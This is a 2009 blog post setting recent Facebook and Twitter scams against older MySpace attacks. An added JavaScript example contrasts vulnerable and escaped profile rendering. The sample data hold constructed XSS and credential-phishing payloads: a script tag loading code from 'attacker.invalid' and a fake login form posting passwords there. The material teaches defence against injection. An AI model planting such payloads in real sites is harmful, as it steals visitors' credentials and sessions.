Tuesday, 19 May 2009

New Facebook Attacks: In Context

For news and advice on today’s Facebook scam, please see the article WARNING: Do Not Click Facebook Links to Ponbon.im

It seems that Facebook scams have been in the news a great deal recently: from the password-stealing phishing attack in April to the FBAction scam the following day to the “justfuns” scam early this month and the “ponbon” scam today. Twitter hasn’t been immune to attack either: numerous variants of the “mikeyy” worm took over user accounts last month, posting unwanted Tweets in user streams.

Are these attacks anything new? Not at all, and you could make the case that this new generation of social networks is somewhat more secure than what went before them.


The MySpace Days


Facebook is increasingly taking the place of two older forms of communication: MySpace and email. MySpace in its day was a security nightmare: the feature that let users embed their own HTML and script in their profile pages created a hacker’s paradise. It made stored cross-site scripting (XSS) trivial: script planted in one profile ran in the browser session of every visitor, where it could read the visitor’s credentials or session token, or act on the visitor’s behalf, with no need to click a link or enter any details.

Even without script, credential theft was easy through plain HTML injection: create a fake MySpace login form, place it on a MySpace page, then wait for a few hundred users to enter their details and copy the form onto their own pages. MySpace eventually had to severely restrict this “custom code” feature to stop these attacks, which broke many MySpace add-ons and with them the ecosystem around MySpace.


Facebook and Twitter Attacks


Facebook isn’t nearly as exposed to XSS, because user-supplied HTML is not part of the product: far less attacker-controlled markup is ever rendered to other users. The biggest Facebook attack so far, the Koobface worm (artist’s impression above), instead relied on social engineering: users clicking a link in a Facebook message, visiting an external site and downloading and running a file. Other attacks relied on users entering their Facebook login details on third-party sites.

Twitter, however, was vulnerable to XSS: attackers found that markup and script placed in the “location” field of a profile was rendered unescaped to anyone viewing that profile. This was a major security hole, since merely viewing an infected profile ran the script in the viewer’s session, and the script could then write the same payload into the viewer’s own profile. Twitter’s viral nature dramatically increased the speed at which the attack spread. Twitter now says it has closed this hole.
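
The two vectors above, script in a profile field and a fake login form embedded in a profile, share one root cause: user-controlled text concatenated into HTML without output encoding. The following is an added example, not code from the original post or from MySpace or Twitter, showing a profile renderer in the vulnerable style beside its hardened form and a crude check for whether a rendering gained tags the template did not put there. The payloads and profile records are constructed for illustration (the `attacker.invalid` host, the field names and the `renderProfile*` helpers are all assumptions), not the real worm or phishing code.

```javascript
// Added example (not from the original post, MySpace or Twitter):
// rendering user-controlled profile fields into HTML, first without and
// then with output encoding. Sample payloads below are constructed.

// Minimal entity encoder for HTML element content and double-quoted
// attribute values. Other contexts (URLs, inline JavaScript, CSS)
// need their own encoders; this one is not sufficient for them.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: raw field values concatenated into markup. This is
// what let a profile page (MySpace) or a "location" field (Twitter) carry
// attacker-chosen markup and script to every visitor.
function renderProfileUnsafe(profile) {
  return '<div class="profile">' +
    '<h1>' + profile.name + '</h1>' +
    '<p class="location">' + profile.location + '</p>' +
    '</div>';
}

// Hardened pattern: every untrusted value is encoded for the HTML context
// it lands in, so the browser shows it as text and never parses it as tags.
function renderProfileSafe(profile) {
  return '<div class="profile">' +
    '<h1>' + escapeHtml(profile.name) + '</h1>' +
    '<p class="location">' + escapeHtml(profile.location) + '</p>' +
    '</div>';
}

// Count tag openers ("<" followed by a letter, "/" or "!") in rendered output.
function countTags(html) {
  return (html.match(/<[a-zA-Z\/!]/g) || []).length;
}

// The template contributes a fixed number of tags (6 here). Any extra tag
// in the output must have come from the user-controlled fields.
const TEMPLATE_TAG_COUNT = countTags(renderProfileSafe({ name: '', location: '' }));

function introducesMarkup(render, profile) {
  return countTags(render(profile)) > TEMPLATE_TAG_COUNT;
}

// Constructed sample inputs: a benign profile, a script payload in the
// location field (the Twitter vector), a fake login form inside a profile
// (the MySpace phishing vector), and benign text with special characters
// that a correct encoder must preserve rather than mangle.
const SAMPLE_PROFILES = {
  benign: { name: 'Alice', location: 'Portland, OR' },
  scriptInLocation: {
    name: 'Mallory',
    location: '<script src="http://attacker.invalid/worm.js"></script>',
  },
  fakeLoginForm: {
    name: 'Trudy',
    location: '<form action="http://attacker.invalid/steal">' +
      'Session expired. <input name="pw" type="password"><input type="submit"></form>',
  },
  specialChars: { name: 'Bob', location: 'O\'Hare "Airport" & more' },
};

// Returns, per sample, whether each renderer let user data become markup.
function summarize() {
  const result = {};
  for (const [label, profile] of Object.entries(SAMPLE_PROFILES)) {
    result[label] = {
      unsafe: introducesMarkup(renderProfileUnsafe, profile),
      safe: introducesMarkup(renderProfileSafe, profile),
    };
  }
  return result;
}

console.log(summarize());
```

The encoded output for the script payload is `&lt;script src=&quot;http://attacker.invalid/worm.js&quot;&gt;...`, which the browser displays literally. Note that encoding is only one of the two fixes the post describes: MySpace chose the other, refusing custom markup altogether, and a site that genuinely needs to allow some user HTML has to run it through a whitelisting sanitizer rather than an encoder.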

Facebook is also much safer than email as a phishing channel: once a phishing link is identified, Facebook can disable it centrally, removing it from every message across the site, which no email provider can do for mail already delivered. The difference is that we have learned to be cautious about links in email, while we have learned to be very trusting of links in Facebook messages from friends. The Facebook threat is a trust problem, not a technical flaw in the Facebook site itself.

So while Facebook attacks might seem unpleasant, take comfort in the fact that Facebook is much more secure than what came before it.